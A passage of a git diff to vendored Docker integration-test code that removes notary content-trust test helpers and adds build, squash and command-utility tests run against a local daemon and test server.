-	// generate server config
-	template := `{
-	"server": {
-		"http_addr": "%s",
-		"tls_key_file": "%s",
-		"tls_cert_file": "%s"
-	},
-	"trust_service": {
-		"type": "local",
-		"hostname": "",
-		"port": "",
-		"key_algorithm": "ed25519"
-	},
-	"logging": {
-		"level": "debug"
-	},
-	"storage": {
-        "backend": "memory"
-    }
-}`
-	tmp, err := ioutil.TempDir("", "notary-test-")
-	if err != nil {
-		return nil, err
-	}
-	confPath := filepath.Join(tmp, "config.json")
-	config, err := os.Create(confPath)
-	if err != nil {
-		return nil, err
-	}
-	defer config.Close()
-
-	workingDir, err := os.Getwd()
-	if err != nil {
-		return nil, err
-	}
-	if _, err := fmt.Fprintf(config, template, notaryHost, filepath.Join(workingDir, "fixtures/notary/localhost.key"), filepath.Join(workingDir, "fixtures/notary/localhost.cert")); err != nil {
-		os.RemoveAll(tmp)
-		return nil, err
-	}
-
-	// generate client config
-	clientConfPath := filepath.Join(tmp, "client-config.json")
-	clientConfig, err := os.Create(clientConfPath)
-	if err != nil {
-		return nil, err
-	}
-	defer clientConfig.Close()
-
-	template = `{
-	"trust_dir" : "%s",
-	"remote_server": {
-		"url": "%s",
-		"skipTLSVerify": true
-	}
-}`
-	if _, err = fmt.Fprintf(clientConfig, template, filepath.Join(cliconfig.ConfigDir(), "trust"), notaryURL); err != nil {
-		os.RemoveAll(tmp)
-		return nil, err
-	}
-
-	// load key fixture filenames
-	var keys []keyPair
-	for i := 1; i < 5; i++ {
-		keys = append(keys, keyPair{
-			Public:  filepath.Join(workingDir, fmt.Sprintf("fixtures/notary/delgkey%v.crt", i)),
-			Private: filepath.Join(workingDir, fmt.Sprintf("fixtures/notary/delgkey%v.key", i)),
-		})
-	}
-
-	// run notary-server
-	cmd := exec.Command(notaryServerBinary, "-config", confPath)
-	if err := cmd.Start(); err != nil {
-		os.RemoveAll(tmp)
-		if os.IsNotExist(err) {
-			c.Skip(err.Error())
-		}
-		return nil, err
-	}
-
-	testNotary := &testNotary{
-		cmd:  cmd,
-		dir:  tmp,
-		keys: keys,
-	}
-
-	// Wait for notary to be ready to serve requests.
-	for i := 1; i <= 20; i++ {
-		if err = testNotary.Ping(); err == nil {
-			break
-		}
-		time.Sleep(10 * time.Millisecond * time.Duration(i*i))
-	}
-
-	if err != nil {
-		c.Fatalf("Timeout waiting for test notary to become available: %s", err)
-	}
-
-	return testNotary, nil
-}
-
-func (t *testNotary) Ping() error {
-	tlsConfig := tlsconfig.ClientDefault()
-	tlsConfig.InsecureSkipVerify = true
-	client := http.Client{
-		Transport: &http.Transport{
-			Proxy: http.ProxyFromEnvironment,
-			Dial: (&net.Dialer{
-				Timeout:   30 * time.Second,
-				KeepAlive: 30 * time.Second,
-			}).Dial,
-			TLSHandshakeTimeout: 10 * time.Second,
-			TLSClientConfig:     tlsConfig,
-		},
-	}
-	resp, err := client.Get(fmt.Sprintf("%s/v2/", notaryURL))
-	if err != nil {
-		return err
-	}
-	if resp.StatusCode != http.StatusOK {
-		return fmt.Errorf("notary ping replied with an unexpected status code %d", resp.StatusCode)
-	}
-	return nil
-}
-
-func (t *testNotary) Close() {
-	t.cmd.Process.Kill()
-	os.RemoveAll(t.dir)
-}
-
-func (s *DockerTrustSuite) trustedCmd(cmd *exec.Cmd) {
-	pwd := "12345678"
-	trustCmdEnv(cmd, notaryURL, pwd, pwd)
-}
-
-func (s *DockerTrustSuite) trustedCmdWithServer(cmd *exec.Cmd, server string) {
-	pwd := "12345678"
-	trustCmdEnv(cmd, server, pwd, pwd)
-}
-
-func (s *DockerTrustSuite) trustedCmdWithPassphrases(cmd *exec.Cmd, rootPwd, repositoryPwd string) {
-	trustCmdEnv(cmd, notaryURL, rootPwd, repositoryPwd)
-}
-
-func trustCmdEnv(cmd *exec.Cmd, server, rootPwd, repositoryPwd string) {
-	env := []string{
-		"DOCKER_CONTENT_TRUST=1",
-		fmt.Sprintf("DOCKER_CONTENT_TRUST_SERVER=%s", server),
-		fmt.Sprintf("DOCKER_CONTENT_TRUST_ROOT_PASSPHRASE=%s", rootPwd),
-		fmt.Sprintf("DOCKER_CONTENT_TRUST_REPOSITORY_PASSPHRASE=%s", repositoryPwd),
-	}
-	cmd.Env = append(os.Environ(), env...)
-}
-
-func (s *DockerTrustSuite) setupTrustedImage(c *check.C, name string) string {
-	repoName := fmt.Sprintf("%v/dockercli/%s:latest", privateRegistryURL, name)
-	// tag the image and upload it to the private registry
-	dockerCmd(c, "tag", "busybox", repoName)
-
-	pushCmd := exec.Command(dockerBinary, "push", repoName)
-	s.trustedCmd(pushCmd)
-	out, _, err := runCommandWithOutput(pushCmd)
-
-	if err != nil {
-		c.Fatalf("Error running trusted push: %s\n%s", err, out)
-	}
-	if !strings.Contains(string(out), "Signing and pushing trust metadata") {
-		c.Fatalf("Missing expected output on trusted push:\n%s", out)
-	}
-
-	if out, status := dockerCmd(c, "rmi", repoName); status != 0 {
-		c.Fatalf("Error removing image %q\n%s", repoName, out)
-	}
-
-	return repoName
-}
-
-func (s *DockerTrustSuite) setupTrustedplugin(c *check.C, source, name string) string {
-	repoName := fmt.Sprintf("%v/dockercli/%s:latest", privateRegistryURL, name)
-	// tag the image and upload it to the private registry
-	dockerCmd(c, "plugin", "install", "--grant-all-permissions", "--alias", repoName, source)
-
-	pushCmd := exec.Command(dockerBinary, "plugin", "push", repoName)
-	s.trustedCmd(pushCmd)
-	out, _, err := runCommandWithOutput(pushCmd)
-
-	if err != nil {
-		c.Fatalf("Error running trusted plugin push: %s\n%s", err, out)
-	}
-	if !strings.Contains(string(out), "Signing and pushing trust metadata") {
-		c.Fatalf("Missing expected output on trusted push:\n%s", out)
-	}
-
-	if out, status := dockerCmd(c, "plugin", "rm", "-f", repoName); status != 0 {
-		c.Fatalf("Error removing plugin %q\n%s", repoName, out)
-	}
-
-	return repoName
-}
-
-func notaryClientEnv(cmd *exec.Cmd) {
-	pwd := "12345678"
-	env := []string{
-		fmt.Sprintf("NOTARY_ROOT_PASSPHRASE=%s", pwd),
-		fmt.Sprintf("NOTARY_TARGETS_PASSPHRASE=%s", pwd),
-		fmt.Sprintf("NOTARY_SNAPSHOT_PASSPHRASE=%s", pwd),
-		fmt.Sprintf("NOTARY_DELEGATION_PASSPHRASE=%s", pwd),
-	}
-	cmd.Env = append(os.Environ(), env...)
-}
-
-func (s *DockerTrustSuite) notaryInitRepo(c *check.C, repoName string) {
-	initCmd := exec.Command(notaryBinary, "-c", filepath.Join(s.not.dir, "client-config.json"), "init", repoName)
-	notaryClientEnv(initCmd)
-	out, _, err := runCommandWithOutput(initCmd)
-	if err != nil {
-		c.Fatalf("Error initializing notary repository: %s\n", out)
-	}
-}
-
-func (s *DockerTrustSuite) notaryCreateDelegation(c *check.C, repoName, role string, pubKey string, paths ...string) {
-	pathsArg := "--all-paths"
-	if len(paths) > 0 {
-		pathsArg = "--paths=" + strings.Join(paths, ",")
-	}
-
-	delgCmd := exec.Command(notaryBinary, "-c", filepath.Join(s.not.dir, "client-config.json"),
-		"delegation", "add", repoName, role, pubKey, pathsArg)
-	notaryClientEnv(delgCmd)
-	out, _, err := runCommandWithOutput(delgCmd)
-	if err != nil {
-		c.Fatalf("Error adding %s role to notary repository: %s\n", role, out)
-	}
-}
-
-func (s *DockerTrustSuite) notaryPublish(c *check.C, repoName string) {
-	pubCmd := exec.Command(notaryBinary, "-c", filepath.Join(s.not.dir, "client-config.json"), "publish", repoName)
-	notaryClientEnv(pubCmd)
-	out, _, err := runCommandWithOutput(pubCmd)
-	if err != nil {
-		c.Fatalf("Error publishing notary repository: %s\n", out)
-	}
-}
-
-func (s *DockerTrustSuite) notaryImportKey(c *check.C, repoName, role string, privKey string) {
-	impCmd := exec.Command(notaryBinary, "-c", filepath.Join(s.not.dir, "client-config.json"), "key",
-		"import", privKey, "-g", repoName, "-r", role)
-	notaryClientEnv(impCmd)
-	out, _, err := runCommandWithOutput(impCmd)
-	if err != nil {
-		c.Fatalf("Error importing key to notary repository: %s\n", out)
-	}
-}
-
-func (s *DockerTrustSuite) notaryListTargetsInRole(c *check.C, repoName, role string) map[string]string {
-	listCmd := exec.Command(notaryBinary, "-c", filepath.Join(s.not.dir, "client-config.json"), "list",
-		repoName, "-r", role)
-	notaryClientEnv(listCmd)
-	out, _, err := runCommandWithOutput(listCmd)
-	if err != nil {
-		c.Fatalf("Error listing targets in notary repository: %s\n", out)
-	}
-
-	// should look something like:
-	//    NAME                                 DIGEST                                SIZE (BYTES)    ROLE
-	// ------------------------------------------------------------------------------------------------------
-	//   latest   24a36bbc059b1345b7e8be0df20f1b23caa3602e85d42fff7ecd9d0bd255de56   1377           targets
-
-	targets := make(map[string]string)
-
-	// no target
-	lines := strings.Split(strings.TrimSpace(out), "\n")
-	if len(lines) == 1 && strings.Contains(out, "No targets present in this repository.") {
-		return targets
-	}
-
-	// otherwise, there is at least one target
-	c.Assert(len(lines), checker.GreaterOrEqualThan, 3)
-
-	for _, line := range lines[2:] {
-		tokens := strings.Fields(line)
-		c.Assert(tokens, checker.HasLen, 4)
-		targets[tokens[0]] = tokens[3]
-	}
-
-	return targets
-}
-
-func (s *DockerTrustSuite) assertTargetInRoles(c *check.C, repoName, target string, roles ...string) {
-	// check all the roles
-	for _, role := range roles {
-		targets := s.notaryListTargetsInRole(c, repoName, role)
-		roleName, ok := targets[target]
-		c.Assert(ok, checker.True)
-		c.Assert(roleName, checker.Equals, role)
-	}
-}
-
-func (s *DockerTrustSuite) assertTargetNotInRoles(c *check.C, repoName, target string, roles ...string) {
-	targets := s.notaryListTargetsInRole(c, repoName, "targets")
-
-	roleName, ok := targets[target]
-	if ok {
-		for _, role := range roles {
-			c.Assert(roleName, checker.Not(checker.Equals), role)
-		}
-	}
-}
diff --git a/vendor/github.com/docker/docker/integration-cli/utils.go b/vendor/github.com/docker/docker/integration-cli/utils.go
deleted file mode 100644
index 87d48e41b0..0000000000
--- a/vendor/github.com/docker/docker/integration-cli/utils.go
+++ /dev/null
@@ -1,79 +0,0 @@
-package main
-
-import (
-	"io"
-	"os"
-	"os/exec"
-	"time"
-
-	"github.com/docker/docker/pkg/integration"
-	"github.com/docker/docker/pkg/integration/cmd"
-)
-
-func getPrefixAndSlashFromDaemonPlatform() (prefix, slash string) {
-	if daemonPlatform == "windows" {
-		return "c:", `\`
-	}
-	return "", "/"
-}
-
-// TODO: update code to call cmd.RunCmd directly, and remove this function
-func runCommandWithOutput(execCmd *exec.Cmd) (string, int, error) {
-	result := cmd.RunCmd(transformCmd(execCmd))
-	return result.Combined(), result.ExitCode, result.Error
-}
-
-// TODO: update code to call cmd.RunCmd directly, and remove this function
-func runCommandWithStdoutStderr(execCmd *exec.Cmd) (string, string, int, error) {
-	result := cmd.RunCmd(transformCmd(execCmd))
-	return result.Stdout(), result.Stderr(), result.ExitCode, result.Error
-}
-
-// TODO: update code to call cmd.RunCmd directly, and remove this function
-func runCommand(execCmd *exec.Cmd) (exitCode int, err error) {
-	result := cmd.RunCmd(transformCmd(execCmd))
-	return result.ExitCode, result.Error
-}
-
-// Temporary shim for migrating commands to the new function
-func transformCmd(execCmd *exec.Cmd) cmd.Cmd {
-	return cmd.Cmd{
-		Command: execCmd.Args,
-		Env:     execCmd.Env,
-		Dir:     execCmd.Dir,
-		Stdin:   execCmd.Stdin,
-		Stdout:  execCmd.Stdout,
-	}
-}
-
-func runCommandPipelineWithOutput(cmds ...*exec.Cmd) (output string, exitCode int, err error) {
-	return integration.RunCommandPipelineWithOutput(cmds...)
-}
-
-func convertSliceOfStringsToMap(input []string) map[string]struct{} {
-	return integration.ConvertSliceOfStringsToMap(input)
-}
-
-func compareDirectoryEntries(e1 []os.FileInfo, e2 []os.FileInfo) error {
-	return integration.CompareDirectoryEntries(e1, e2)
-}
-
-func listTar(f io.Reader) ([]string, error) {
-	return integration.ListTar(f)
-}
-
-func randomTmpDirPath(s string, platform string) string {
-	return integration.RandomTmpDirPath(s, platform)
-}
-
-func consumeWithSpeed(reader io.Reader, chunkSize int, interval time.Duration, stop chan bool) (n int, err error) {
-	return integration.ConsumeWithSpeed(reader, chunkSize, interval, stop)
-}
-
-func parseCgroupPaths(procCgroupData string) map[string]string {
-	return integration.ParseCgroupPaths(procCgroupData)
-}
-
-func runAtDifferentDate(date time.Time, block func()) {
-	integration.RunAtDifferentDate(date, block)
-}
diff --git a/vendor/github.com/docker/docker/integration-cli/utils_test.go b/vendor/github.com/docker/docker/integration-cli/utils_test.go
new file mode 100644
index 0000000000..fd083681f2
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/utils_test.go
@@ -0,0 +1,183 @@
+package main
+
+import (
+	"fmt"
+	"os"
+	"os/exec"
+	"path/filepath"
+	"strings"
+
+	"github.com/docker/docker/internal/testutil"
+	"github.com/go-check/check"
+	"github.com/pkg/errors"
+	"gotest.tools/icmd"
+)
+
+func getPrefixAndSlashFromDaemonPlatform() (prefix, slash string) {
+	if testEnv.OSType == "windows" {
+		return "c:", `\`
+	}
+	return "", "/"
+}
+
+// TODO: update code to call cmd.RunCmd directly, and remove this function
+// Deprecated: use gotest.tools/icmd
+func runCommandWithOutput(execCmd *exec.Cmd) (string, int, error) {
+	result := icmd.RunCmd(transformCmd(execCmd))
+	return result.Combined(), result.ExitCode, result.Error
+}
+
+// Temporary shim for migrating commands to the new function
+func transformCmd(execCmd *exec.Cmd) icmd.Cmd {
+	return icmd.Cmd{
+		Command: execCmd.Args,
+		Env:     execCmd.Env,
+		Dir:     execCmd.Dir,
+		Stdin:   execCmd.Stdin,
+		Stdout:  execCmd.Stdout,
+	}
+}
+
+// ParseCgroupPaths parses 'procCgroupData', which is output of '/proc/<pid>/cgroup', and returns
+// a map which cgroup name as key and path as value.
+func ParseCgroupPaths(procCgroupData string) map[string]string {
+	cgroupPaths := map[string]string{}
+	for _, line := range strings.Split(procCgroupData, "\n") {
+		parts := strings.Split(line, ":")
+		if len(parts) != 3 {
+			continue
+		}
+		cgroupPaths[parts[1]] = parts[2]
+	}
+	return cgroupPaths
+}
+
+// RandomTmpDirPath provides a temporary path with rand string appended.
+// does not create or checks if it exists.
+func RandomTmpDirPath(s string, platform string) string {
+	// TODO: why doesn't this use os.TempDir() ?
+	tmp := "/tmp"
+	if platform == "windows" {
+		tmp = os.Getenv("TEMP")
+	}
+	path := filepath.Join(tmp, fmt.Sprintf("%s.%s", s, testutil.GenerateRandomAlphaOnlyString(10)))
+	if platform == "windows" {
+		return filepath.FromSlash(path) // Using \
+	}
+	return filepath.ToSlash(path) // Using /
+}
+
+// RunCommandPipelineWithOutput runs the array of commands with the output
+// of each pipelined with the following (like cmd1 | cmd2 | cmd3 would do).
+// It returns the final output, the exitCode different from 0 and the error
+// if something bad happened.
+// Deprecated: use icmd instead
+func RunCommandPipelineWithOutput(cmds ...*exec.Cmd) (output string, err error) {
+	if len(cmds) < 2 {
+		return "", errors.New("pipeline does not have multiple cmds")
+	}
+
+	// connect stdin of each cmd to stdout pipe of previous cmd
+	for i, cmd := range cmds {
+		if i > 0 {
+			prevCmd := cmds[i-1]
+			cmd.Stdin, err = prevCmd.StdoutPipe()
+
+			if err != nil {
+				return "", fmt.Errorf("cannot set stdout pipe for %s: %v", cmd.Path, err)
+			}
+		}
+	}
+
+	// start all cmds except the last
+	for _, cmd := range cmds[:len(cmds)-1] {
+		if err = cmd.Start(); err != nil {
+			return "", fmt.Errorf("starting %s failed with error: %v", cmd.Path, err)
+		}
+	}
+
+	defer func() {
+		var pipeErrMsgs []string
+		// wait all cmds except the last to release their resources
+		for _, cmd := range cmds[:len(cmds)-1] {
+			if pipeErr := cmd.Wait(); pipeErr != nil {
+				pipeErrMsgs = append(pipeErrMsgs, fmt.Sprintf("command %s failed with error: %v", cmd.Path, pipeErr))
+			}
+		}
+		if len(pipeErrMsgs) > 0 && err == nil {
+			err = fmt.Errorf("pipelineError from Wait: %v", strings.Join(pipeErrMsgs, ", "))
+		}
+	}()
+
+	// wait on last cmd
+	out, err := cmds[len(cmds)-1].CombinedOutput()
+	return string(out), err
+}
+
+type elementListOptions struct {
+	element, format string
+}
+
+func existingElements(c *check.C, opts elementListOptions) []string {
+	var args []string
+	switch opts.element {
+	case "container":
+		args = append(args, "ps", "-a")
+	case "image":
+		args = append(args, "images", "-a")
+	case "network":
+		args = append(args, "network", "ls")
+	case "plugin":
+		args = append(args, "plugin", "ls")
+	case "volume":
+		args = append(args, "volume", "ls")
+	}
+	if opts.format != "" {
+		args = append(args, "--format", opts.format)
+	}
+	out, _ := dockerCmd(c, args...)
+	var lines []string
+	for _, l := range strings.Split(out, "\n") {
+		if l != "" {
+			lines = append(lines, l)
+		}
+	}
+	return lines
+}
+
+// ExistingContainerIDs returns a list of currently existing container IDs.
+func ExistingContainerIDs(c *check.C) []string {
+	return existingElements(c, elementListOptions{element: "container", format: "{{.ID}}"})
+}
+
+// ExistingContainerNames returns a list of existing container names.
+func ExistingContainerNames(c *check.C) []string {
+	return existingElements(c, elementListOptions{element: "container", format: "{{.Names}}"})
+}
+
+// RemoveLinesForExistingElements removes existing elements from the output of a
+// docker command.
+// This function takes an output []string and returns a []string.
+func RemoveLinesForExistingElements(output, existing []string) []string {
+	for _, e := range existing {
+		index := -1
+		for i, line := range output {
+			if strings.Contains(line, e) {
+				index = i
+				break
+			}
+		}
+		if index != -1 {
+			output = append(output[:index], output[index+1:]...)
+		}
+	}
+	return output
+}
+
+// RemoveOutputForExistingElements removes existing elements from the output of
+// a docker command.
+// This function takes an output string and returns a string.
+func RemoveOutputForExistingElements(output string, existing []string) string {
+	res := RemoveLinesForExistingElements(strings.Split(output, "\n"), existing)
+	return strings.Join(res, "\n")
+}
diff --git a/vendor/github.com/docker/docker/integration/build/build_session_test.go b/vendor/github.com/docker/docker/integration/build/build_session_test.go
new file mode 100644
index 0000000000..dde4b427b4
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/build/build_session_test.go
@@ -0,0 +1,129 @@
+package build
+
+import (
+	"context"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	dclient "github.com/docker/docker/client"
+	"github.com/docker/docker/internal/test/fakecontext"
+	"github.com/docker/docker/internal/test/request"
+	"github.com/moby/buildkit/session"
+	"github.com/moby/buildkit/session/filesync"
+	"golang.org/x/sync/errgroup"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+	"gotest.tools/skip"
+)
+
+func TestBuildWithSession(t *testing.T) {
+	skip.If(t, !testEnv.DaemonInfo.ExperimentalBuild)
+
+	client := testEnv.APIClient()
+
+	dockerfile := `
+		FROM busybox
+		COPY file /
+		RUN cat /file
+	`
+
+	fctx := fakecontext.New(t, "",
+		fakecontext.WithFile("file", "some content"),
+	)
+	defer fctx.Close()
+
+	out := testBuildWithSession(t, client, client.DaemonHost(), fctx.Dir, dockerfile)
+	assert.Check(t, is.Contains(out, "some content"))
+
+	fctx.Add("second", "contentcontent")
+
+	dockerfile += `
+	COPY second /
+	RUN cat /second
+	`
+
+	out = testBuildWithSession(t, client, client.DaemonHost(), fctx.Dir, dockerfile)
+	assert.Check(t, is.Equal(strings.Count(out, "Using cache"), 2))
+	assert.Check(t, is.Contains(out, "contentcontent"))
+
+	du, err := client.DiskUsage(context.TODO())
+	assert.Check(t, err)
+	assert.Check(t, du.BuilderSize > 10)
+
+	out = testBuildWithSession(t, client, client.DaemonHost(), fctx.Dir, dockerfile)
+	assert.Check(t, is.Equal(strings.Count(out, "Using cache"), 4))
+
+	du2, err := client.DiskUsage(context.TODO())
+	assert.Check(t, err)
+	assert.Check(t, is.Equal(du.BuilderSize, du2.BuilderSize))
+
+	// rebuild with regular tar, confirm cache still applies
+	fctx.Add("Dockerfile", dockerfile)
+	// FIXME(vdemeester) use sock here
+	res, body, err := request.Do(
+		"/build",
+		request.Host(client.DaemonHost()),
+		request.Method(http.MethodPost),
+		request.RawContent(fctx.AsTarReader(t)),
+		request.ContentType("application/x-tar"))
+	assert.NilError(t, err)
+	assert.Check(t, is.DeepEqual(http.StatusOK, res.StatusCode))
+
+	outBytes, err := request.ReadBody(body)
+	assert.NilError(t, err)
+	assert.Check(t, is.Contains(string(outBytes), "Successfully built"))
+	assert.Check(t, is.Equal(strings.Count(string(outBytes), "Using cache"), 4))
+
+	_, err = client.BuildCachePrune(context.TODO())
+	assert.Check(t, err)
+
+	du, err = client.DiskUsage(context.TODO())
+	assert.Check(t, err)
+	assert.Check(t, is.Equal(du.BuilderSize, int64(0)))
+}
+
+func testBuildWithSession(t *testing.T, client dclient.APIClient, daemonHost string, dir, dockerfile string) (outStr string) {
+	ctx := context.Background()
+	sess, err := session.NewSession(ctx, "foo1", "foo")
+	assert.Check(t, err)
+
+	fsProvider := filesync.NewFSSyncProvider([]filesync.SyncedDir{
+		{Dir: dir},
+	})
+	sess.Allow(fsProvider)
+
+	g, ctx := errgroup.WithContext(ctx)
+
+	g.Go(func() error {
+		return sess.Run(ctx, client.DialSession)
+	})
+
+	g.Go(func() error {
+		// FIXME use sock here
+		res, body, err := request.Do(
+			"/build?remote=client-session&session="+sess.ID(),
+			request.Host(daemonHost),
+			request.Method(http.MethodPost),
+			request.With(func(req *http.Request) error {
+				req.Body = ioutil.NopCloser(strings.NewReader(dockerfile))
+				return nil
+			}),
+		)
+		if err != nil {
+			return err
+		}
+		assert.Check(t, is.DeepEqual(res.StatusCode, http.StatusOK))
+		out, err := request.ReadBody(body)
+		assert.NilError(t, err)
+		assert.Check(t, is.Contains(string(out), "Successfully built"))
+		sess.Close()
+		outStr = string(out)
+		return nil
+	})
+
+	err = g.Wait()
+	assert.Check(t, err)
+	return
+}
diff --git a/vendor/github.com/docker/docker/integration/build/build_squash_test.go b/vendor/github.com/docker/docker/integration/build/build_squash_test.go
new file mode 100644
index 0000000000..4cd282a976
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/build/build_squash_test.go
@@ -0,0 +1,103 @@
+package build
+
+import (
+	"bytes"
+	"context"
+	"io"
+	"io/ioutil"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/integration/internal/container"
+	"github.com/docker/docker/internal/test/fakecontext"
+	"github.com/docker/docker/pkg/stdcopy"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+	"gotest.tools/skip"
+)
+
+func TestBuildSquashParent(t *testing.T) {
+	skip.If(t, !testEnv.DaemonInfo.ExperimentalBuild)
+
+	client := testEnv.APIClient()
+
+	dockerfile := `
+		FROM busybox
+		RUN echo hello > /hello
+		RUN echo world >> /hello
+		RUN echo hello > /remove_me
+		ENV HELLO world
+		RUN rm /remove_me
+		`
+
+	// build and get the ID that we can use later for history comparison
+	ctx := context.Background()
+	source := fakecontext.New(t, "", fakecontext.WithDockerfile(dockerfile))
+	defer source.Close()
+
+	name := "test"
+	resp, err := client.ImageBuild(ctx,
+		source.AsTarReader(t),
+		types.ImageBuildOptions{
+			Remove:      true,
+			ForceRemove: true,
+			Tags:        []string{name},
+		})
+	assert.NilError(t, err)
+	_, err = io.Copy(ioutil.Discard, resp.Body)
+	resp.Body.Close()
+	assert.NilError(t, err)
+
+	inspect, _, err := client.ImageInspectWithRaw(ctx, name)
+	assert.NilError(t, err)
+	origID := inspect.ID
+
+	// build with squash
+	resp, err = client.ImageBuild(ctx,
+		source.AsTarReader(t),
+		types.ImageBuildOptions{
+			Remove:      true,
+			ForceRemove: true,
+			Squash:      true,
+			Tags:        []string{name},
+		})
+	assert.NilError(t, err)
+	_, err = io.Copy(ioutil.Discard, resp.Body)
+	resp.Body.Close()
+	assert.NilError(t, err)
+
+	cid := container.Run(t, ctx, client,
+		container.WithImage(name),
+		container.WithCmd("/bin/sh", "-c", "cat /hello"),
+	)
+	reader, err := client.ContainerLogs(ctx, cid, types.ContainerLogsOptions{
+		ShowStdout: true,
+	})
+	assert.NilError(t, err)
+
+	actualStdout := new(bytes.Buffer)
+	actualStderr := ioutil.Discard
+	_, err = stdcopy.StdCopy(actualStdout, actualStderr, reader)
+	assert.NilError(t, err)
+	assert.Check(t, is.Equal(strings.TrimSpace(actualStdout.String()), "hello\nworld"))
+
+	container.Run(t, ctx, client,
+		container.WithImage(name),
+		container.WithCmd("/bin/sh", "-c", "[ ! -f /remove_me ]"),
+	)
+	container.Run(t, ctx, client,
+		container.WithImage(name),
+		container.WithCmd("/bin/sh", "-c", `[ "$(echo $HELLO)" == "world" ]`),
+	)
+
+	origHistory, err := client.ImageHistory(ctx, origID)
+	assert.NilError(t, err)
+	testHistory, err := client.ImageHistory(ctx, name)
+	assert.NilError(t, err)
+
+	inspect, _, err = client.ImageInspectWithRaw(ctx, name)
+	assert.NilError(t, err)
+	assert.Check(t, is.Len(testHistory, len(origHistory)+1))
+	assert.Check(t, is.Len(inspect.RootFS.Layers, 2))
+}
diff --git a/vendor/github.com/docker/docker/integration/build/build_test.go b/vendor/github.com/docker/docker/integration/build/build_test.go
new file mode 100644
index 0000000000..25c5e635bd
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/build/build_test.go
@@ -0,0 +1,460 @@
+package build // import "github.com/docker/docker/integration/build"
+
+import (
+	"archive/tar"
+	"bytes"
+	"context"
+	"encoding/json"
+	"io"
+	"io/ioutil"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/filters"
+	"github.com/docker/docker/api/types/versions"
+	"github.com/docker/docker/internal/test/fakecontext"
+	"github.com/docker/docker/internal/test/request"
+	"github.com/docker/docker/pkg/jsonmessage"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+	"gotest.tools/skip"
+)
+
+func TestBuildWithRemoveAndForceRemove(t *testing.T) {
+	defer setupTest(t)()
+	t.Parallel()
+	cases := []struct {
+		name                           string
+		dockerfile                     string
+		numberOfIntermediateContainers int
+		rm                             bool
+		forceRm                        bool
+	}{
+		{
+			name: "successful build with no removal",
+			dockerfile: `FROM busybox
+			RUN exit 0
+			RUN exit 0`,
+			numberOfIntermediateContainers: 2,
+			rm:      false,
+			forceRm: false,
+		},
+		{
+			name: "successful build with remove",
+			dockerfile: `FROM busybox
+			RUN exit 0
+			RUN exit 0`,
+			numberOfIntermediateContainers: 0,
+			rm:      true,
+			forceRm: false,
+		},
+		{
+			name: "successful build with remove and force remove",
+			dockerfile: `FROM busybox
+			RUN exit 0
+			RUN exit 0`,
+			numberOfIntermediateContainers: 0,
+			rm:      true,
+			forceRm: true,
+		},
+		{
+			name: "failed build with no removal",
+			dockerfile: `FROM busybox
+			RUN exit 0
+			RUN exit 1`,
+			numberOfIntermediateContainers: 2,
+			rm:      false,
+			forceRm: false,
+		},
+		{
+			name: "failed build with remove",
+			dockerfile: `FROM busybox
+			RUN exit 0
+			RUN exit 1`,
+			numberOfIntermediateContainers: 1,
+			rm:      true,
+			forceRm: false,
+		},
+		{
+			name: "failed build with remove and force remove",
+			dockerfile: `FROM busybox
+			RUN exit 0
+			RUN exit 1`,
+			numberOfIntermediateContainers: 0,
+			rm:      true,
+			forceRm: true,
+		},
+	}
+
+	client := request.NewAPIClient(t)
+	ctx := context.Background()
+	for _, c := range cases {
+		t.Run(c.name, func(t *testing.T) {
+			t.Parallel()
+			dockerfile := []byte(c.dockerfile)
+
+			buff := bytes.NewBuffer(nil)
+			tw := tar.NewWriter(buff)
+			assert.NilError(t, tw.WriteHeader(&tar.Header{
+				Name: "Dockerfile",
+				Size: int64(len(dockerfile)),
+			}))
+			_, err := tw.Write(dockerfile)
+			assert.NilError(t, err)
+			assert.NilError(t, tw.Close())
+			resp, err := client.ImageBuild(ctx, buff, types.ImageBuildOptions{Remove: c.rm, ForceRemove: c.forceRm, NoCache: true})
+			assert.NilError(t, err)
+			defer resp.Body.Close()
+			filter, err := buildContainerIdsFilter(resp.Body)
+			assert.NilError(t, err)
+			remainingContainers, err := client.ContainerList(ctx, types.ContainerListOptions{Filters: filter, All: true})
+			assert.NilError(t, err)
+			assert.Equal(t, c.numberOfIntermediateContainers, len(remainingContainers), "Expected %v remaining intermediate containers, got %v", c.numberOfIntermediateContainers, len(remainingContainers))
+		})
+	}
+}
+
+func buildContainerIdsFilter(buildOutput io.Reader) (filters.Args, error) {
+	const intermediateContainerPrefix = " ---> Running in "
+	filter := filters.NewArgs()
+
+	dec := json.NewDecoder(buildOutput)
+	for {
+		m := jsonmessage.JSONMessage{}
+		err := dec.Decode(&m)
+		if err == io.EOF {
+			return filter, nil
+		}
+		if err != nil {
+			return filter, err
+		}
+		if ix := strings.Index(m.Stream, intermediateContainerPrefix); ix != -1 {
+			filter.Add("id", strings.TrimSpace(m.Stream[ix+len(intermediateContainerPrefix):]))
+		}
+	}
+}
+
+func TestBuildMultiStageParentConfig(t *testing.T) {
+	skip.If(t, versions.LessThan(testEnv.DaemonAPIVersion(), "1.35"), "broken in earlier versions")
+	dockerfile := `
+		FROM busybox AS stage0
+		ENV WHO=parent
+		WORKDIR /foo
+
+		FROM stage0
+		ENV WHO=sibling1
+		WORKDIR sub1
+
+		FROM stage0
+		WORKDIR sub2
+	`
+	ctx := context.Background()
+	source := fakecontext.New(t, "", fakecontext.WithDockerfile(dockerfile))
+	defer source.Close()
+
+	apiclient := testEnv.APIClient()
+	resp, err := apiclient.ImageBuild(ctx,
+		source.AsTarReader(t),
+		types.ImageBuildOptions{
+			Remove:      true,
+			ForceRemove: true,
+			Tags:        []string{"build1"},
+		})
+	assert.NilError(t, err)
+	_, err = io.Copy(ioutil.Discard, resp.Body)
+	resp.Body.Close()
+	assert.NilError(t, err)
+
+	image, _, err := apiclient.ImageInspectWithRaw(ctx, "build1")
+	assert.NilError(t, err)
+
+	assert.Check(t, is.Equal("/foo/sub2", image.Config.WorkingDir))
